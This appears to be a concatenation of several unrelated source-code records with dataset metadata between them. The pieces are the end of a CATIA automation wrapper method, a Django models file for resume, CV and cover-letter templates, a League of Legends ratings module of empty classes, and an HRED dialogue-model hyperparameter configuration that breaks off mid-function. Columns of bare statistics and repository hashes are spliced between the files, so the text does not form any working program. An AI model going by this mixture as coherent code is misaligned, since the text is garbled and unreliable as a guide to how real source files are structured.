CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetSameDisplayLock(boolean iLocked)
|
| Deprecated:
| V5R15. Use SetDimensionsDisplayLock. Locks or unlocks the SameDisplay
| parameter.
| Role:Locks or unlocks the SameDisplay parameter if it is possible in
| the current administrative context. In user mode this method will always return
| E_FAIL.
| Parameters:
|
| iLocked
| the locking operation to be performed Legal
| values:
| TRUE : to lock the parameter.
| FALSE: to unlock the parameter.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetSameDisplayLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_same_display_lock'
# # vba_code = """
# # Public Function set_same_display_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetSameDisplayLock iLocked
# # set_same_display_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def __repr__(self):
return f'UnitsSheetSettingAtt(name="{self.name}")'
| 40.312268
| 117
| 0.546539
| 3,174
| 32,532
| 5.42281
| 0.092628
| 0.025564
| 0.04247
| 0.049965
| 0.827911
| 0.785847
| 0.719556
| 0.691727
| 0.687079
| 0.664246
| 0
| 0.031397
| 0.39103
| 32,532
| 806
| 118
| 40.362283
| 0.837414
| 0.663378
| 0
| 0.091954
| 1
| 0
| 0.006045
| 0.006045
| 0
| 0
| 0
| 0
| 0
| 1
| 0.367816
| false
| 0
| 0.011494
| 0.011494
| 0.701149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cad66b7f60c093d0c7362487434ec3f4023aa4b2
| 1,794
|
py
|
Python
|
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
# Create your models here.
class Template(models.Model):
template_type=models.CharField(max_length=200,db_index=True)
template_name=models.CharField(unique=True,max_length=200,db_index=True)
slug=models.SlugField(max_length=200,unique=True)
stars = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])
description = models.TextField(max_length=255)
template_image = models.ImageField(upload_to='resumetemplates/')
addtowishlist = models.BooleanField(default= False)
def __str__(self):
return self.template_name
class Cvtemplate(models.Model):
template_type=models.CharField(max_length=200,db_index=True)
template_name=models.CharField(unique=True,max_length=200,db_index=True)
slug=models.SlugField(max_length=200,unique=True)
stars = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])
description = models.TextField(max_length=255)
template_image = models.ImageField(upload_to='cvtemplates/')
addtowishlist = models.BooleanField(default= False)
def __str__(self):
return self.template_name
class Coverlettertemplate(models.Model):
template_type=models.CharField(max_length=200,db_index=True)
template_name=models.CharField(unique=True,max_length=200,db_index=True)
slug=models.SlugField(max_length=200,unique=True)
stars = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])
description = models.TextField(max_length=255)
template_image = models.ImageField(upload_to='coverlettertemplates/')
addtowishlist = models.BooleanField(default= False)
def __str__(self):
return self.template_name
| 42.714286
| 88
| 0.777035
| 217
| 1,794
| 6.21659
| 0.230415
| 0.080059
| 0.080059
| 0.062268
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0
| 0.026532
| 0.117614
| 1,794
| 41
| 89
| 43.756098
| 0.825648
| 0.013378
| 0
| 0.75
| 0
| 0
| 0.027715
| 0.011878
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0.0625
| 0.09375
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1b07df45499e0d7ced26040874837514e382a551
| 6,269
|
py
|
Python
|
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Bard_Mid_Aatrox(Ratings):
pass
class NA_Bard_Mid_Ahri(Ratings):
pass
class NA_Bard_Mid_Akali(Ratings):
pass
class NA_Bard_Mid_Alistar(Ratings):
pass
class NA_Bard_Mid_Amumu(Ratings):
pass
class NA_Bard_Mid_Anivia(Ratings):
pass
class NA_Bard_Mid_Annie(Ratings):
pass
class NA_Bard_Mid_Ashe(Ratings):
pass
class NA_Bard_Mid_AurelionSol(Ratings):
pass
class NA_Bard_Mid_Azir(Ratings):
pass
class NA_Bard_Mid_Bard(Ratings):
pass
class NA_Bard_Mid_Blitzcrank(Ratings):
pass
class NA_Bard_Mid_Brand(Ratings):
pass
class NA_Bard_Mid_Braum(Ratings):
pass
class NA_Bard_Mid_Caitlyn(Ratings):
pass
class NA_Bard_Mid_Camille(Ratings):
pass
class NA_Bard_Mid_Cassiopeia(Ratings):
pass
class NA_Bard_Mid_Chogath(Ratings):
pass
class NA_Bard_Mid_Corki(Ratings):
pass
class NA_Bard_Mid_Darius(Ratings):
pass
class NA_Bard_Mid_Diana(Ratings):
pass
class NA_Bard_Mid_Draven(Ratings):
pass
class NA_Bard_Mid_DrMundo(Ratings):
pass
class NA_Bard_Mid_Ekko(Ratings):
pass
class NA_Bard_Mid_Elise(Ratings):
pass
class NA_Bard_Mid_Evelynn(Ratings):
pass
class NA_Bard_Mid_Ezreal(Ratings):
pass
class NA_Bard_Mid_Fiddlesticks(Ratings):
pass
class NA_Bard_Mid_Fiora(Ratings):
pass
class NA_Bard_Mid_Fizz(Ratings):
pass
class NA_Bard_Mid_Galio(Ratings):
pass
class NA_Bard_Mid_Gangplank(Ratings):
pass
class NA_Bard_Mid_Garen(Ratings):
pass
class NA_Bard_Mid_Gnar(Ratings):
pass
class NA_Bard_Mid_Gragas(Ratings):
pass
class NA_Bard_Mid_Graves(Ratings):
pass
class NA_Bard_Mid_Hecarim(Ratings):
pass
class NA_Bard_Mid_Heimerdinger(Ratings):
pass
class NA_Bard_Mid_Illaoi(Ratings):
pass
class NA_Bard_Mid_Irelia(Ratings):
pass
class NA_Bard_Mid_Ivern(Ratings):
pass
class NA_Bard_Mid_Janna(Ratings):
pass
class NA_Bard_Mid_JarvanIV(Ratings):
pass
class NA_Bard_Mid_Jax(Ratings):
pass
class NA_Bard_Mid_Jayce(Ratings):
pass
class NA_Bard_Mid_Jhin(Ratings):
pass
class NA_Bard_Mid_Jinx(Ratings):
pass
class NA_Bard_Mid_Kalista(Ratings):
pass
class NA_Bard_Mid_Karma(Ratings):
pass
class NA_Bard_Mid_Karthus(Ratings):
pass
class NA_Bard_Mid_Kassadin(Ratings):
pass
class NA_Bard_Mid_Katarina(Ratings):
pass
class NA_Bard_Mid_Kayle(Ratings):
pass
class NA_Bard_Mid_Kayn(Ratings):
pass
class NA_Bard_Mid_Kennen(Ratings):
pass
class NA_Bard_Mid_Khazix(Ratings):
pass
class NA_Bard_Mid_Kindred(Ratings):
pass
class NA_Bard_Mid_Kled(Ratings):
pass
class NA_Bard_Mid_KogMaw(Ratings):
pass
class NA_Bard_Mid_Leblanc(Ratings):
pass
class NA_Bard_Mid_LeeSin(Ratings):
pass
class NA_Bard_Mid_Leona(Ratings):
pass
class NA_Bard_Mid_Lissandra(Ratings):
pass
class NA_Bard_Mid_Lucian(Ratings):
pass
class NA_Bard_Mid_Lulu(Ratings):
pass
class NA_Bard_Mid_Lux(Ratings):
pass
class NA_Bard_Mid_Malphite(Ratings):
pass
class NA_Bard_Mid_Malzahar(Ratings):
pass
class NA_Bard_Mid_Maokai(Ratings):
pass
class NA_Bard_Mid_MasterYi(Ratings):
pass
class NA_Bard_Mid_MissFortune(Ratings):
pass
class NA_Bard_Mid_MonkeyKing(Ratings):
pass
class NA_Bard_Mid_Mordekaiser(Ratings):
pass
class NA_Bard_Mid_Morgana(Ratings):
pass
class NA_Bard_Mid_Nami(Ratings):
pass
class NA_Bard_Mid_Nasus(Ratings):
pass
class NA_Bard_Mid_Nautilus(Ratings):
pass
class NA_Bard_Mid_Nidalee(Ratings):
pass
class NA_Bard_Mid_Nocturne(Ratings):
pass
class NA_Bard_Mid_Nunu(Ratings):
pass
class NA_Bard_Mid_Olaf(Ratings):
pass
class NA_Bard_Mid_Orianna(Ratings):
pass
class NA_Bard_Mid_Ornn(Ratings):
pass
class NA_Bard_Mid_Pantheon(Ratings):
pass
class NA_Bard_Mid_Poppy(Ratings):
pass
class NA_Bard_Mid_Quinn(Ratings):
pass
class NA_Bard_Mid_Rakan(Ratings):
pass
class NA_Bard_Mid_Rammus(Ratings):
pass
class NA_Bard_Mid_RekSai(Ratings):
pass
class NA_Bard_Mid_Renekton(Ratings):
pass
class NA_Bard_Mid_Rengar(Ratings):
pass
class NA_Bard_Mid_Riven(Ratings):
pass
class NA_Bard_Mid_Rumble(Ratings):
pass
class NA_Bard_Mid_Ryze(Ratings):
pass
class NA_Bard_Mid_Sejuani(Ratings):
pass
class NA_Bard_Mid_Shaco(Ratings):
pass
class NA_Bard_Mid_Shen(Ratings):
pass
class NA_Bard_Mid_Shyvana(Ratings):
pass
class NA_Bard_Mid_Singed(Ratings):
pass
class NA_Bard_Mid_Sion(Ratings):
pass
class NA_Bard_Mid_Sivir(Ratings):
pass
class NA_Bard_Mid_Skarner(Ratings):
pass
class NA_Bard_Mid_Sona(Ratings):
pass
class NA_Bard_Mid_Soraka(Ratings):
pass
class NA_Bard_Mid_Swain(Ratings):
pass
class NA_Bard_Mid_Syndra(Ratings):
pass
class NA_Bard_Mid_TahmKench(Ratings):
pass
class NA_Bard_Mid_Taliyah(Ratings):
pass
class NA_Bard_Mid_Talon(Ratings):
pass
class NA_Bard_Mid_Taric(Ratings):
pass
class NA_Bard_Mid_Teemo(Ratings):
pass
class NA_Bard_Mid_Thresh(Ratings):
pass
class NA_Bard_Mid_Tristana(Ratings):
pass
class NA_Bard_Mid_Trundle(Ratings):
pass
class NA_Bard_Mid_Tryndamere(Ratings):
pass
class NA_Bard_Mid_TwistedFate(Ratings):
pass
class NA_Bard_Mid_Twitch(Ratings):
pass
class NA_Bard_Mid_Udyr(Ratings):
pass
class NA_Bard_Mid_Urgot(Ratings):
pass
class NA_Bard_Mid_Varus(Ratings):
pass
class NA_Bard_Mid_Vayne(Ratings):
pass
class NA_Bard_Mid_Veigar(Ratings):
pass
class NA_Bard_Mid_Velkoz(Ratings):
pass
class NA_Bard_Mid_Vi(Ratings):
pass
class NA_Bard_Mid_Viktor(Ratings):
pass
class NA_Bard_Mid_Vladimir(Ratings):
pass
class NA_Bard_Mid_Volibear(Ratings):
pass
class NA_Bard_Mid_Warwick(Ratings):
pass
class NA_Bard_Mid_Xayah(Ratings):
pass
class NA_Bard_Mid_Xerath(Ratings):
pass
class NA_Bard_Mid_XinZhao(Ratings):
pass
class NA_Bard_Mid_Yasuo(Ratings):
pass
class NA_Bard_Mid_Yorick(Ratings):
pass
class NA_Bard_Mid_Zac(Ratings):
pass
class NA_Bard_Mid_Zed(Ratings):
pass
class NA_Bard_Mid_Ziggs(Ratings):
pass
class NA_Bard_Mid_Zilean(Ratings):
pass
class NA_Bard_Mid_Zyra(Ratings):
pass
| 15.033573
| 46
| 0.75642
| 972
| 6,269
| 4.452675
| 0.151235
| 0.223198
| 0.350739
| 0.446396
| 0.791359
| 0.791359
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177221
| 6,269
| 416
| 47
| 15.069712
| 0.839085
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1b76567a713e75ae9afadb2be538c049b53017bd
| 102,340
|
py
|
Python
|
parlai/agents/hred/state.py
|
marcotcr/ParlAI
|
54c83b3de57ee4d7984d0f60a4cd09c9cda3f08e
|
[
"BSD-3-Clause"
] | 2
|
2017-10-06T09:56:49.000Z
|
2017-10-06T09:57:03.000Z
|
parlai/agents/hred/state.py
|
gmkim90/KBKAIST_Chatbot
|
4766e6ee61a10e3719b7608c5777430ddfd277f9
|
[
"BSD-3-Clause"
] | null | null | null |
parlai/agents/hred/state.py
|
gmkim90/KBKAIST_Chatbot
|
4766e6ee61a10e3719b7608c5777430ddfd277f9
|
[
"BSD-3-Clause"
] | 2
|
2017-10-06T09:57:04.000Z
|
2018-11-08T13:45:47.000Z
|
from collections import OrderedDict
import cPickle
import os
def prototype_state():
state = {}
# ----- CONSTANTS -----
# Random seed
state['seed'] = 1234
# Logging level
state['level'] = 'DEBUG'
# Out-of-vocabulary token string
state['oov'] = '<unk>'
# These are end-of-sequence marks
state['end_sym_utterance'] = '</s>'
# Special tokens need to be defined here, because model architecture may adapt depending on these
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = 2 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = 3 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = 4 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = 5 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = 6 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = 7 # voice over symbol <voice_over>
state['off_screen_sym'] = 8 # off screen symbol <off_screen>
state['pause_sym'] = 9 # pause symbol <pause>
# ----- MODEL ARCHITECTURE -----
# If this flag is on, the hidden state between RNNs in subsequences is always initialized to zero.
# Set this to reset all RNN hidden states between 'max_grad_steps' time steps
state['reset_hidden_states_between_subsequences'] = False
# If this flag is on, the maxout activation function will be applied to the utterance decoders output unit.
# This requires qdim_decoder = 2x rankdim
state['maxout_out'] = False
# If this flag is on, a one-layer MLP with linear activation function will applied
# on the utterance decoder hidden state before outputting the distribution over words.
state['deep_utterance_decoder_out'] = True
# If this flag is on, there will be an extra MLP between utterance and dialogue encoder
state['deep_dialogue_encoder_input'] = False
# Default and recommended setting is: tanh.
# The utterance encoder and utterance decoder activation function
state['sent_rec_activation'] = 'lambda x: T.tanh(x)'
# The dialogue encoder activation function
state['dialogue_rec_activation'] = 'lambda x: T.tanh(x)'
# Determines how to input the utterance encoder and dialogue encoder into the utterance decoder RNN hidden state:
# - 'first': initializes first hidden state of decoder using encoders
# - 'all': initializes first hidden state of decoder using encoders,
# and inputs all hidden states of decoder using encoders
# - 'selective': initializes first hidden state of decoder using encoders,
# and inputs all hidden states of decoder using encoders.
# Furthermore, a gating function is applied to the encoder input
# to turn off certain dimensions if necessary.
#
# Experiments show that 'all' is most effective.
state['decoder_bias_type'] = 'all'
# Define the gating function for the three RNNs.
state['utterance_encoder_gating'] = 'GRU' # Supports 'None' and 'GRU'
state['dialogue_encoder_gating'] = 'GRU' # Supports 'None' and 'GRU'
state['utterance_decoder_gating'] = 'GRU' # Supports 'None', 'BOW' (Bag of Words), 'GRU' and 'LSTM'
# If this flag is on, two utterances encoders (one forward and one backward) will be used,
# otherwise only a forward utterance encoder is used.
state['bidirectional_utterance_encoder'] = False
# If this flag is on, there will be a direct connection between utterance encoder and utterance decoder RNNs.
state['direct_connection_between_encoders_and_decoder'] = False
# If this flag is on, there will be an extra MLP between utterance encoder and utterance decoder.
state['deep_direct_connection'] = False
# If the 'direct_connection_between_encoders_and_decoder' is on, then enabling this flag will
# change the model so that it does not use the dialogue encoder (context encoder)
state['disable_dialogue_encoder'] = False
# If this flag is on, the model will collaps to a standard RNN:
# 1) The utterance+dialogue encoder input to the utterance decoder will be zero
# 2) The utterance decoder will never be reset
# Note this model will always be initialized with a hidden state equal to zero.
state['collaps_to_standard_rnn'] = False
# If this flag is on, the utterance decoder will be reset after each end-of-utterance token.
state['reset_utterance_decoder_at_end_of_utterance'] = True
# If this flag is on, the utterance encoder will be reset after each end-of-utterance token.
state['reset_utterance_encoder_at_end_of_utterance'] = False
# ----- HIDDEN LAYER DIMENSIONS -----
# Dimensionality of (word-level) utterance encoder hidden state
state['qdim_encoder'] = 512
# Dimensionality of (word-level) utterance decoder (RNN which generates output) hidden state
state['qdim_decoder'] = 512
# Dimensionality of (utterance-level) context encoder hidden layer
state['sdim'] = 1000
# Dimensionality of low-rank word embedding approximation
state['rankdim'] = 256
# ----- LATENT VARIABLES WITH VARIATIONAL LEARNING -----
# If this flag is on, a Gaussian latent variable is added at the beginning of each utterance.
# The utterance decoder will be conditioned on this latent variable,
# and the model will be trained using the variational lower bound.
# See, for example, the variational auto-encoder by Kingma et al. (2013).
state['add_latent_gaussian_per_utterance'] = False
# This flag will condition the latent variables on the dialogue encoder
state['condition_latent_variable_on_dialogue_encoder'] = False
# This flag will condition the latent variable on the DCGM (mean pooling over words) encoder.
# This will replace the conditioning on the utterance encoder.
# If the flag is false, the latent variable will be conditioned on the utterance encoder RNN.
state['condition_posterior_latent_variable_on_dcgm_encoder'] = False
# Dimensionality of Gaussian latent variable, which has diagonal covariance matrix.
state['latent_gaussian_per_utterance_dim'] = 10
# This is a constant by which the diagonal covariance matrix is scaled.
# By setting it to a high number (e.g. 1 or 10),
# the KL divergence will be relatively low at the beginning of training.
state['scale_latent_gaussian_variable_variances'] = 10
state['min_latent_gaussian_variable_variances'] = 0.01
state['max_latent_gaussian_variable_variances'] = 10.0
# If on, will make apply a one-layer MLP to transform the input before computing the prior
# and posterior of the Gaussian latent variable.
state['deep_latent_gaussian_variable_conditioning'] = True
# If this flag is on, the utterance decoder will ONLY be conditioned on the Gaussian latent variable.
state['condition_decoder_only_on_latent_variable'] = False
# If this flag is on, a piecewise latent variable is added at the beginning of each utterance.
# The utterance decoder will be conditioned on this latent variable,
# and the model will be trained using the variational lower bound.
# See, for example, the variational auto-encoder by Kingma et al. (2013).
state['add_latent_piecewise_per_utterance'] = False
# If this flag is on, the posterior piecewise distribution will be interpolated
# with the prior distribution using a linear gating mechanism.
state['gate_latent_piecewise_per_utterance'] = True
state['latent_piecewise_alpha_variables'] = 5
# This is a constant by which the prior piecewise alpha parameters are scaled.
# By setting it to a number in the range (2.0, 10) the piecewise posterior distributions will
# be free to change appropriately to accomodate the real posterior,
# while still leaving some probability mass around 0.5 for the variable to change.
# With scale_latent_piecewise_variable_alpha=10, KL divergence cost is about 10% of overall cost initially.
# With scale_latent_piecewise_variable_alpha=1, KL divergence cost is about 1% of overall cost initially.
state['scale_latent_piecewise_variable_alpha_use_softplus'] = True
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['latent_piecewise_per_utterance_dim'] = 10
# If parameter tying is enabled, a Gaussian convolution is applied to all the the alpha values.
# This makes the alpha values dependent upon each other, and guarantees that a single sample
# will update the weight of all the alpha values with higher gradients to nearby values.
# Julian: This only helped slightly in my intial experiments.
state['latent_piecewise_variable_alpha_parameter_tying'] = False
state['latent_piecewise_variable_alpha_parameter_tying_beta'] = 1.0
# If on, will make apply a one-layer MLP to transform the input before computing the prior
# and posterior of the piecewise latent variable.
state['deep_latent_piecewise_variable_conditioning'] = True
# If this flag is on, the input to the utterance decoder will be passed through
# a one-layer MLP with rectified linear units.
# If batch normalization or layer normalization is on,
# this will also ensure that the inputs to the decoder RNN are normalized.
state['deep_utterance_decoder_input'] = True
# If this flag is on, the KL-divergence term weight for the latent variables
# will be slowly increased from zero to one.
state['train_latent_variables_with_kl_divergence_annealing'] = False
# The KL-divergence term weight is increased by this parameter for every training batch.
# It is truncated to one. For example, 1.0/60000.0 means that at iteration 60000 the model
# will assign weight one to the KL-divergence term (assuming kl_divergence_max_weight=1.0)
# and thus only be maximizing the true variational bound from iteration 60000 and onward.
state['kl_divergence_annealing_rate'] = 1.0/60000.0
# The maximum KL-divergence term weight allowed. Only applies to models with annealed KL-divergence.
state['kl_divergence_max_weight'] = 1.0
# If this flag is enabled, previous token input to the decoder RNN is replaced with 'unk' tokens at random.
state['decoder_drop_previous_input_tokens'] = False
# The rate at which the previous tokesn input to the decoder is kept (not set to 'unk').
# Setting this to zero effectively disables teacher-forcing in the model.
state['decoder_drop_previous_input_tokens_rate'] = 0.75
# If this flag is enabled, mean field inference with stochastic gradient descent is applied during test time.
# Julian: This didn't really make a big difference...
state['apply_meanfield_inference'] = False
# Word embedding initialization
state['initialize_from_pretrained_word_embeddings'] = False
state['pretrained_word_embeddings_file'] = ''
state['fix_pretrained_word_embeddings'] = False
# If this flag is on, the model will fix the parameters of the utterance encoder and dialogue encoder RNNs,
# as well as the word embeddings. NOTE: NOT APPLICABLE when the flag 'collaps_to_standard_rnn' is on.
state['fix_encoder_parameters'] = False
# If this flag is disabled, the model will not generate the first utterance in a dialogue.
# This is used for the debate dataset as well as the skip_utterance configuration.
state['do_generate_first_utterance'] = True
# If this flag is enabled, the data iterator is changed so that the model is conditioned
# on exactly one utterance and predicts only one utterance; the utterance to predict is
# either the next utterance or the previous utterance in the dialogue.
# When this flag is on, it forces the 'do_generate_first_utterance' to be off.
state['skip_utterance'] = False
# If 'skip_utterance' flag is enabled together with this flag, the data iterator is changed so
# that the model always predicts both the previous and next utterances.
# Note, this will double the batch size!
state['skip_utterance_predict_both'] = False
# ----- TRAINING PROCEDURE -----
# Choose optimization algorithm (adam works well most of the time)
state['updater'] = 'adam'
# If this flag is on, NCE (Noise-Contrastive Estimation) will be used to train model.
# This is significantly faster for large vocabularies (e.g. more than 20K words),
# but experiments show that this degrades performance.
state['use_nce'] = False
# Threshold to clip the gradient
state['cutoff'] = 0.01
# Learning rate. The rate 0.0002 seems to work well across many tasks with adam.
# Alternatively, the learning rate can be adjusted down (e.g. 0.00004)
# to at the end of training to help the model converge well.
state['lr'] = 0.0002
# Early stopping configuration
state['patience'] = 20
state['cost_threshold'] = 1.003
# Batch size. If out of memory, modify this!
state['bs'] = 80
# Sort by length groups of
state['sort_k_batches'] = 20
# Training examples will be split into subsequences.
# This parameter controls the maximum size of each subsequence.
# Gradients will be computed on the subsequence, and the last hidden state of all RNNs will
# be used to initialize the hidden state of the RNNs in the next subsequence.
state['max_grad_steps'] = 80
# Modify this in the prototype
state['save_dir'] = './'
# Frequency of training error reports (in number of batches)
state['train_freq'] = 10
# Validation frequency
state['valid_freq'] = 5000
# Number of batches to process
state['loop_iters'] = 3000000
# Maximum number of minutes to run
state['time_stop'] = 24*60*31
# Error level to stop at
state['minerr'] = -1
# Maximum dialogue length
state['max_len'] = -1
# The model can apply several normalization operators to the encoder hidden states:
# 'NONE': No normalization is applied.
# 'BN': Batch normalization is applied.
# 'LN': Layer normalization is applied.
#
# Note the normalization operators can only be applied to GRU encoders and feed-forward neural networks.
state['normop_type'] = 'LN'
if state['normop_type'] == 'BN':
state['normop_gamma_init'] = 0.1
state['normop_gamma_min'] = 0.05
state['normop_gamma_max'] = 10.0
state['normop_moving_average_const'] = 0.99
state['normop_max_enc_seq'] = 50
else:
state['normop_gamma_init'] = 1.0
state['normop_gamma_min'] = 0.05
state['normop_gamma_max'] = 10.0
state['normop_moving_average_const'] = 0.99
state['normop_max_enc_seq'] = 1
# Parameters for initializing the training data iterator.
# The first is the first offset position in the list examples.
# The second is the number of reshuffles to perform at the beginning.
state['train_iterator_offset'] = 0
state['train_iterator_reshuffle_count'] = 1
return state
def prototype_test():
state = prototype_state()
# Fill paths here!
state['train_dialogues'] = "./tests/data/ttrain.dialogues.pkl"
state['test_dialogues'] = "./tests/data/ttest.dialogues.pkl"
state['valid_dialogues'] = "./tests/data/tvalid.dialogues.pkl"
state['dictionary'] = "./tests/data/ttrain.dict.pkl"
state['save_dir'] = "./tests/models/"
state['max_grad_steps'] = 20
# Handle pretrained word embeddings. Using this requires rankdim=10
state['initialize_from_pretrained_word_embeddings'] = False
state['pretrained_word_embeddings_file'] = './tests/data/MT_WordEmb.pkl'
state['fix_pretrained_word_embeddings'] = False
state['valid_freq'] = 50
state['prefix'] = "testmodel_"
state['updater'] = 'adam'
state['maxout_out'] = False
state['deep_utterance_decoder_out'] = True
state['deep_dialogue_encoder_input'] = True
state['utterance_encoder_gating'] = 'GRU'
state['dialogue_encoder_gating'] = 'GRU'
state['utterance_decoder_gating'] = 'GRU'
state['bidirectional_utterance_encoder'] = True
state['direct_connection_between_encoders_and_decoder'] = True
state['bs'] = 5
state['sort_k_batches'] = 1
state['use_nce'] = False
state['decoder_bias_type'] = 'all'
state['qdim_encoder'] = 15
state['qdim_decoder'] = 5
state['sdim'] = 10
state['rankdim'] = 10
return state
def prototype_test_variational():
state = prototype_state()
# Fill paths here!
state['train_dialogues'] = "./tests/data/ttrain.dialogues.pkl"
state['test_dialogues'] = "./tests/data/ttest.dialogues.pkl"
state['valid_dialogues'] = "./tests/data/tvalid.dialogues.pkl"
state['dictionary'] = "./tests/data/ttrain.dict.pkl"
state['save_dir'] = "./tests/models/"
state['max_grad_steps'] = 20
# Handle pretrained word embeddings. Using this requires rankdim=10
state['initialize_from_pretrained_word_embeddings'] = True
state['pretrained_word_embeddings_file'] = './tests/data/MT_WordEmb.pkl'
state['valid_freq'] = 5
state['prefix'] = "testmodel_"
state['updater'] = 'adam'
state['maxout_out'] = False
state['deep_utterance_decoder_out'] = True
state['deep_dialogue_encoder_input'] = True
state['direct_connection_between_encoders_and_decoder'] = False
state['deep_direct_connection'] = False
state['utterance_encoder_gating'] = 'GRU'
state['dialogue_encoder_gating'] = 'GRU'
state['utterance_decoder_gating'] = 'LSTM'
state['bidirectional_utterance_encoder'] = False
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 5
state['condition_latent_variable_on_dialogue_encoder'] = True
state['condition_posterior_latent_variable_on_dcgm_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 10
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['bs'] = 5
state['sort_k_batches'] = 1
state['use_nce'] = False
state['decoder_bias_type'] = 'all'
state['qdim_encoder'] = 15
state['qdim_decoder'] = 5
state['sdim'] = 10
state['rankdim'] = 10
state['gate_latent_piecewise_per_utterance'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_max_weight'] = 0.5
# KL max-trick
#state['train_latent_variables_with_kl_divergence_annealing'] = False
#state['max_kl_percentage'] = 0.01
return state
###
### Twitter - Hyperparameter search for HRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_HRED_NormOp_ClusterExp1():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 500
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
